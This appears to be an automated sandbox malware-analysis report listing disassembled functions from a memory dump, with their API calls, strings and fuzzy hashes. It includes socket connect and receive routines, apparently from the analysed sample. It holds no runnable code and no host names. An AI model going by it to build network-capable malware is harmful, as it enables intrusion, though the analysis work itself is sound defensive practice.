APIs

__Mtx_unlock.LIBCPMT ref: 005FDE2D
recv.WS2_32(?,?,00001F40,00000000), ref: 005FDE66
recv.WS2_32(?,?,00001F40,00000000), ref: 005FDE94
closesocket.WS2_32(?), ref: 005FDF08
__Mtx_unlock.LIBCPMT ref: 005FDF3D

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Mtx_unlockrecv$closesocket
String ID:
API String ID: 1157980791-0
Opcode ID: 09aa08f8643a81486020ee636143b9f2e235f957f07e7d5e64f6ba6fabf053f7
Instruction ID: 6acaa676a2dcd18f425319ef63a7d3f919aa5945849d68b4ae8571ff1981e563
Opcode Fuzzy Hash: 09aa08f8643a81486020ee636143b9f2e235f957f07e7d5e64f6ba6fabf053f7
Instruction Fuzzy Hash: 2451D4709402099FDB15DF10CC49A6ABBB7FF14314F1442ADED09AB292EB31AD50CB55

Function 00626DE1 Relevance: 7.6, APIs: 5, Instructions: 141pipeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetFileType.KERNEL32(?,?,00000000,00000000), ref: 00626E03
GetFileInformationByHandle.KERNEL32(?,?), ref: 00626E5D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00626D13,?,000000FF), ref: 00626EEB
__dosmaperr.LIBCMT ref: 00626EF2
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00626F2F

Part of subcall function 00627157: __dosmaperr.LIBCMT ref: 0062718C

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 1206951868-0
Opcode ID: f4e065713bfd413a72d56d71a0ab22b1d09591343a23abe4461ed64aff575b00
Instruction ID: f320101679b7a9a3f5ee6b5077ea29c397805ebb79d4d172e0d7d182fa3559c9
Opcode Fuzzy Hash: f4e065713bfd413a72d56d71a0ab22b1d09591343a23abe4461ed64aff575b00
Instruction Fuzzy Hash: 81415A75904A54AFDF24DFA5EC459ABBBFAEF89300B00442DF956D3610EB309844CF21

Function 0061DA40 Relevance: 7.6, APIs: 5, Instructions: 123COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0061DA74

Part of subcall function 00618E3F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00618E60

Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0061DAD3
Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0061DAF9
Concurrency::details::SchedulerBase::ReleaseInternalContext.LIBCONCRT ref: 0061DB19
Concurrency::location::_Assign.LIBCMT ref: 0061DB66

Part of subcall function 0062123F: Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 00621284

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Context$Base::Concurrency::details::$Internal$Event$AssignBlockingConcurrency::location::_FindNestingPrepareReleaseSchedulerStealerThrowTraceWork
String ID:
API String ID: 1879022333-0
Opcode ID: 9ad29e997513d7a3e05421a3463e6eb99de0e576ebd354c90ca2bca83b4b74b3
Instruction ID: 948cc0ff6d4c297cc54956f68b408430c6524e25e875c154e00b67470ef892f6
Opcode Fuzzy Hash: 9ad29e997513d7a3e05421a3463e6eb99de0e576ebd354c90ca2bca83b4b74b3
Instruction Fuzzy Hash: 0341E3B0608210ABDF19EB24C896BEEBB779F45710F19419DE8069B3C2CB749D85C791

Function 006185D9 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 006185FE

Part of subcall function 0060E9E0: _SpinWait.LIBCONCRT ref: 0060E9F8

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 00618612
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00618644
List.LIBCMT ref: 006186C7
List.LIBCMT ref: 006186D6

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: 809d20ce2295119f52ba5761dc564ed7ed908bd74e730492e2092afdde69ab3b
Instruction ID: 82be63c4c9efb444ba52032fb5ea8eaf9a626304c45738047f4a8ec441a6a75f
Opcode Fuzzy Hash: 809d20ce2295119f52ba5761dc564ed7ed908bd74e730492e2092afdde69ab3b
Instruction Fuzzy Hash: 6C317872901656DFCB68EFA4D5916EDBBB2BF14308F18006ED80167692DF316E84CBD8

Function 005FDCAF Relevance: 7.6, APIs: 5, Instructions: 80networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000000,?,?), ref: 005FDD0C
FreeAddrInfoW.WS2_32(?), ref: 005FDD2D
socket.WS2_32(00000002,00000001,00000000), ref: 005FDD55
connect.WS2_32(00000000,?,00000010), ref: 005FDD67
closesocket.WS2_32(00000000), ref: 005FDD81

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: AddrFreeInfoclosesocketconnectgetaddrinfosocket
String ID:
API String ID: 242599585-0
Opcode ID: 6790b6965482fceeb68961e714d1485875b07239b26738e4925a515708b8a4b3
Instruction ID: 65d0558820c7da7c01f07e1d65934eab19986b9a6a5b4e2e0feefe181661649d
Opcode Fuzzy Hash: 6790b6965482fceeb68961e714d1485875b07239b26738e4925a515708b8a4b3
Instruction Fuzzy Hash: 4421A871D042289BEB15DB90DC4ABBEB7BAEF04301F00119EFA09D72C1D6B95E409F65

Function 00619BA5 Relevance: 7.6, APIs: 5, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00619BAC
Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 00619BF8
std::bad_exception::bad_exception.LIBCMT ref: 00619C0E
Concurrency::SchedulerPolicy::_ResolvePolicyValues.LIBCONCRT ref: 00619C50
std::bad_exception::bad_exception.LIBCMT ref: 00619C7A

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::PolicyPolicy::_Schedulerstd::bad_exception::bad_exception$H_prolog3_catchResolveValidValueValues
String ID:
API String ID: 921398678-0
Opcode ID: ef9b70a35f92caa2a880959b22ece8ffb028dfcbd9e5ac01791697456fab7852
Instruction ID: 746c6e926fb9f0af05e4a47127566c8d1c77cddec7a70e328ef480b90c89b1c2
Opcode Fuzzy Hash: ef9b70a35f92caa2a880959b22ece8ffb028dfcbd9e5ac01791697456fab7852
Instruction Fuzzy Hash: AE21D671904104DFCB48EFA4D952DEDB7F6EF05310B184029F141AB281EB306E81CBE5

Function 0062EEDA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0062EEF2

Part of subcall function 0062AC95: HeapFree.KERNEL32(00000000,00000000,?,0062EF6D,?,00000000,?,?,?,0062EF94,?,00000007,?,?,0062F396,?), ref: 0062ACAB
Part of subcall function 0062AC95: GetLastError.KERNEL32(?,?,0062EF6D,?,00000000,?,?,?,0062EF94,?,00000007,?,?,0062F396,?,?), ref: 0062ACBD

_free.LIBCMT ref: 0062EF04
_free.LIBCMT ref: 0062EF16
_free.LIBCMT ref: 0062EF28
_free.LIBCMT ref: 0062EF3A

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e02bfa699f3ffc8a7aa55855d1d5b335ed23e10fdc25ae0510c92075d2df7d88
Instruction ID: 6cfc01f0824750c39a3305343c8f6dc4655e0a41388170e7f2083833a5c18839
Opcode Fuzzy Hash: e02bfa699f3ffc8a7aa55855d1d5b335ed23e10fdc25ae0510c92075d2df7d88
Instruction Fuzzy Hash: 4EF09632604B26ABC765EB94FBC1C5677EBFB453157685819F009DB601CB31FC808E59

Function 0062D8BE Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0062DA58

Strings

*?, xrefs: 0062D901

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 325afc00bb60ee3a94fc5eb9cb9f72fa75536f813325374459f70a58a738c4d1
Instruction ID: c1b19502f450be6ec6833564be991ede56f014e2d8a6daf01beb87d3dabd1510
Opcode Fuzzy Hash: 325afc00bb60ee3a94fc5eb9cb9f72fa75536f813325374459f70a58a738c4d1
Instruction Fuzzy Hash: EB615F75E006299FCF14CFA8D8819EDFBF6EF48310B24816AE855E7300E675AE418F90

Function 0062556B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 00625590
CatchIt.LIBVCRUNTIME ref: 00625676

Strings

MOC, xrefs: 006255A2
RCC, xrefs: 006255AA

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: d363235f7d2d5b8023703119853120dc52de8e7c67ac0ecd914d51b4f7ee29ce
Instruction ID: 24c8f8119c026f3e8bf77f3c14b124791f3844288ea0a30cbf2e3a9fb22dbc7b
Opcode Fuzzy Hash: d363235f7d2d5b8023703119853120dc52de8e7c67ac0ecd914d51b4f7ee29ce
Instruction Fuzzy Hash: 2B418C72900A19AFCF26DF94DC81AEE7BB6BF48300F198099F905A7221D7359960DF50

Function 006326ED Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00632760
_free.LIBCMT ref: 006327B6

Part of subcall function 00632592: _free.LIBCMT ref: 006325EA
Part of subcall function 00632592: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00646748), ref: 006325FC

Strings

Hgd, xrefs: 00632719

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID: Hgd
API String ID: 597776487-3786104139
Opcode ID: 68ccfd8f2f2d9d7abdc4fde532c1b148f34a4536f9e759d23744183eae2e3154
Instruction ID: 8f3c9369726c7dba76ce35c0c617b24e1acece780d889bd1c194b6681c067d28
Opcode Fuzzy Hash: 68ccfd8f2f2d9d7abdc4fde532c1b148f34a4536f9e759d23744183eae2e3154
Instruction Fuzzy Hash: F6216D3290022B67CB31A7349D91EEB77BFEB81324F100359F4A5A2291EB704D8689D5

Function 00634DE7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00634E52
_free.LIBCMT ref: 00634E61
_free.LIBCMT ref: 00634E70

Strings

(b, xrefs: 00634E3C

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: _free$EnvironmentVariable
String ID: (b
API String ID: 1464849758-2237311770
Opcode ID: 54c300852efe07253214e5fd3093f4c6698379570a49967c354ff7bae72bbd2c
Instruction ID: 6ea845e38e6ba18b367b9fc2da3a87acc0da5e94c5c34a9236325e282a4aab4f
Opcode Fuzzy Hash: 54c300852efe07253214e5fd3093f4c6698379570a49967c354ff7bae72bbd2c
Instruction Fuzzy Hash: 19114F71C01228AFDF019FA9E9819EEFFB9BF08314F54406EE814B2251D7745A44CFA4

Function 00619FFE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0061A012
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0061A036
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0061A049

Strings

pScheduler, xrefs: 0061A041

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 246774199-923244539
Opcode ID: e8e5b63ca483379247d775ff2fec3584173aadad4823d0705950c107727e20c0
Instruction ID: 254a1bbde1ce4ee2f7f1456887942accaeffc2f3d5bdff0bd61a3d6c06c1573c
Opcode Fuzzy Hash: e8e5b63ca483379247d775ff2fec3584173aadad4823d0705950c107727e20c0
Instruction Fuzzy Hash: FCF09E31900604A7C724FB90DC42CDFB33B9F9071A72C802EE81213281EB71EEC6C696

Function 0060FD2A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegisterWaitForSingleObject.KERNEL32(?,?,00000001,5b,000000FF,0000000C), ref: 0060FD41
GetLastError.KERNEL32(?,00620935,?,00620835,?,?,?,?,?,?,00615BBE,?), ref: 0060FD50
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0060FD66

Strings

5b, xrefs: 0060FD37

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastObjectRegisterSingleWait
String ID: 5b
API String ID: 2296417588-2946450772
Opcode ID: 8138786ef2e1751a8833f468335ae2df990688891b1130eb81f3b8738ee8c380
Instruction ID: f823c432e36dfd6287a453077f5bfee2ab8c1f5fad57a4ae8d958ff4c8d2cb59
Opcode Fuzzy Hash: 8138786ef2e1751a8833f468335ae2df990688891b1130eb81f3b8738ee8c380
Instruction Fuzzy Hash: 1FF08C3454011AABDF10EFA0DD05EEB376EAF00710F100564B650E21E0DA34D6009B64

Function 0062C990 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0062CA17

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 6ce9b122a8b3e71e1b9d85e24c4c8e5c2461f141074a280fd85b1d8695520d9e
Instruction ID: 7d1a43cdc7250918ef8dc164e8a9c511f9fdea791827c079d0050083377d3d46
Opcode Fuzzy Hash: 6ce9b122a8b3e71e1b9d85e24c4c8e5c2461f141074a280fd85b1d8695520d9e
Instruction Fuzzy Hash: 6DB11832A00AA59FDB15CF28D8827EEBBE7EF55360F148169E845EB341D6348D42CF64

Function 00624F5E Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00625025
___AdjustPointer.LIBCMT ref: 00625048
___AdjustPointer.LIBCMT ref: 006250E4

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 04e9d16d29a78062975851c55de25b358322863eb6bc7f006ad1231994192db5
Instruction ID: 87f3c89ab2567d8b5ea638c536e68c6f324f6659ac516d01e9f27bdbf0122273
Opcode Fuzzy Hash: 04e9d16d29a78062975851c55de25b358322863eb6bc7f006ad1231994192db5
Instruction Fuzzy Hash: 4151C372A01E229FDB398F50E851BBA77A7EF50710F14852DE8064B291E731EC80CF90

Function 005F8290 Relevance: 6.2, APIs: 4, Instructions: 155libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C,?,52CC3793), ref: 005F8309
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005F8370
GetProcAddress.KERNEL32(00000000), ref: 005F8377

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID:
API String ID: 3310240892-0
Opcode ID: b1f46c4979afb89e1d68f7865d51165eda9fc866e6f1c7f250c3ff572df1a74e
Instruction ID: 3979d4296b81652f311316aeb6aa32226bc373daf096e81f10482fad2fd8bc70
Opcode Fuzzy Hash: b1f46c4979afb89e1d68f7865d51165eda9fc866e6f1c7f250c3ff572df1a74e
Instruction Fuzzy Hash: B9513770D0021D9BEB14EB28CD497FEBB75FB45704F504298EA08A72D2EF785A848F91

Function 00624B25 Relevance: 6.1, APIs: 4, Instructions: 141COMMON

Download Yara Rule

APIs

TypeidsEqual.LIBVCRUNTIME ref: 00624B76
TypeidsEqual.LIBVCRUNTIME ref: 00624B9B
PMDtoOffset.LIBCMT ref: 00624BB1
PMDtoOffset.LIBCMT ref: 00624C32

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
